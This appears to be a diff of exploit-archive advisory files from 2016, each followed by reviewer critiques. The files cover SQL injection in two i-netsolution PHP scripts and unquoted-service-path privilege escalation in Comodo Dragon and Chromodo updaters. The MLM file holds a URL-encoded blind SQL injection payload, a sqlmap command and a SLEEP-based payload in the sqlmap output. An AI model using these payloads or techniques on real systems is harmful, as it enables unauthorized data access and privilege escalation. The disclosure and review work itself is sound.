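Review bot: same classification problem as 40467: the title says "Blind SQL Vulnerabilities" and the csv row "Blind SQL Injection", yet the sqlmap section reports a "Generic UNION query (NULL) - 33 columns" payload. The `| Exploit` URL ends with a stray `'` that the `| Proof of concept` line omits, the description is cut off at "with efficiency", no product version is given, and "Aadmin Page" repeats the typo.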
44
platforms/php/webapps/40469.txt
Executable file
|
@ -0,0 +1,44 @@
|
|||
######################
|
||||
# Application Name : MLM Unilevel Plan Script v1.0.2
|
||||
|
||||
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
|
||||
|
||||
# Author Contact : https://twitter.com/byn4tural
|
||||
|
||||
# Vendor Homepage : http://www.i-netsolution.com/
|
||||
|
||||
# Vulnerable Type : SQL Injection
|
||||
|
||||
# Date : 2016-10-06
|
||||
|
||||
# Tested on : Windows 10 / Mozilla Firefox
|
||||
# Linux / Mozilla Firefox
|
||||
# Linux / sqlmap 1.0.6.28#dev
|
||||
|
||||
###################### SQL Injection Vulnerability ######################
|
||||
|
||||
# Location :
|
||||
http://localhost/[path]/news_detail.php
|
||||
|
||||
######################
|
||||
|
||||
# PoC Exploit:
|
||||
|
||||
http://localhost/[path]/news_detail.php?newid=11%27%20%2F*%2130000and%20ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%20and*%2F%20%27x%27%3D%27x
|
||||
|
||||
# Exploit Code via sqlmap:
|
||||
|
||||
sqlmap -u http://localhost/[path]/news_detail.php?newid=11 --dbs
|
||||
|
||||
---
|
||||
Parameter: newid (GET)
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: newid=11' AND SLEEP(5) AND 'HheB'='HheB
|
||||
---
|
||||
[18:47:12] [INFO] the back-end DBMS is MySQL
|
||||
web application technology: Nginx
|
||||
back-end DBMS: MySQL >= 5.0.12
|
||||
|
||||
######################
|
||||
|
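Review bot: this looks like a duplicate of 40466 submitted the same day: both target an i-netsolution MLM script, both name `news_detail.php` with the GET parameter `newid`, and both report blind injection against MySQL; if "MLM Unilevel Plan Script v1.0.2" and "Advance MLM Script" are the same product line, one record should reference the other rather than both being indexed separately. The "# Tested on" lines name the browser and the sqlmap build but give no product version beyond the title; the `[18:47:12] [INFO]` sqlmap excerpt is worth keeping because it records the DBMS fingerprint.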
40
platforms/php/webapps/40470.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
[x]========================================================================================================================================[x]
| Title : Just Dial Clone Script SQL & XSS Vulnerabilities
| Software : Just Dial Clone
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/just-dial-clone/live_demo/423618
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 299
| Description : If you wish to launch your own business directory website, we have a readymade solution for you which supports unlimited
categories, uses and secure code. Our Company Catalogue Listing Script is just the right script for you
[x]========================================================================================================================================[x]


[x]========================================================================================================================================[x]
| Exploit : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21
| Admin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
| Proof of concept SQL : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21
[x]========================================================================================================================================[x]

[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]

[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]
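Review bot: the title claims "SQL & XSS Vulnerabilities" but the file contains no XSS proof of concept at all, and the "Proof of concept SQL" line merely repeats the "Exploit" URL with the `%Inject_Here%21` placeholder, so no injection string, error or response on `fid` is ever shown. The exploit URLs also hard-code `/jus/` while the admin page uses `[path]`. Add a concrete payload and the observed result for `fid`, add the XSS vector or drop XSS from the title, and use `[path]` consistently.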
53
platforms/windows/local/40471.txt
Executable file
@ -0,0 +1,53 @@
# Exploit Title: Comodo Dragon Browser Unquoted Service Path Privilege Escalation
# Date: 24/09/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: https://www.comodo.com
# Software Link: https://www.comodo.com/home/browsers-toolbars/browser.php
# Version: Software Version <= 52.15.25.663
# Tested on: Windows 7 x86/x64

1. Description

Comodo Dragon Browser Update Service (DragonUpdater) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.


2. Proof of Concept

C:\>sc qc DragonUpdater
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DragonUpdater
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : COMODO Dragon Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


3. Exploit:

A successful attempt would require the local attacker must insert an executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.


Additional notes :

Fixed in version 52.15.25.664
https://forums.comodo.com/news-announcements-feedback-cd/comodo-dragon-v521525664-is-now-available-for-download-t116786.0.html

Vulnerability Disclosure Timeline:
=========================
24/09/2016 - Contact With Vendor
26/09/2016 - Vendor Response
03/10/2016 - Release Fixed Version
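Review bot: the `sc qc` output supports the unquoted-path and `LocalSystem` claims, but section 3 never shows that a non-privileged user can write where Windows would look first. For `C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe` the only candidate paths created by the unquoted spaces are `C:\Program.exe` and `C:\Program Files.exe`, both files in the root of the system drive, and a default Windows 7 install lets standard users create subfolders there but not files. Add `icacls C:\` output from the tested system to show the write access the finding depends on, and note that a standard user normally cannot stop or start the service, so the realistic trigger is the `AUTO_START` at reboot rather than a service restart.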
53
platforms/windows/local/40473.txt
Executable file
@ -0,0 +1,53 @@
# Exploit Title: Comodo Chromodo Browser Unquoted Service Path Privilege Escalation
# Date: 03/10/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: https://www.comodo.com
# Software Link: https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php
# Version: Software Version <= 52.15.25.664
# Tested on: Windows 7 x86/x64

1. Description

Comodo Chromodo Browser Update Service (ChromodoUpdater) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.


2. Proof of Concept

C:\>sc qc ChromodoUpdater
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ChromodoUpdater
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Comodo\Chromodo\chromodo_updater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : COMODO Chromodo Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


3. Exploit:

A successful attempt would require the local attacker must insert an executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.


Additional notes :

Fixed in version 52.15.25.665
https://forums.comodo.com/news-announcements-feedback-cd/chromodo-v521525665-is-now-available-for-download-t116787.0.html

Vulnerability Disclosure Timeline:
=========================
03/10/2016 - Contact With Vendor
03/10/2016 - Vendor Response
05/10/2016 - Release Fixed Version
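Review bot: this file is a copy of the Dragon advisory with names swapped and carries the same gap, but here it is narrower: `C:\Program Files\Comodo\Chromodo\chromodo_updater.exe` contains a single unquoted space, so the only alternate path the service manager would try is `C:\Program.exe`, and the whole finding rests on a standard user being able to create a file in the root of the system drive. Include `icacls C:\` from the tested Windows 7 system to prove that. Separately, the version line (`<= 52.15.25.664`) coincides with the Dragon fixed version in the sibling file; state explicitly that these are Chromodo build numbers (fixed in 52.15.25.665) so the two products are not conflated.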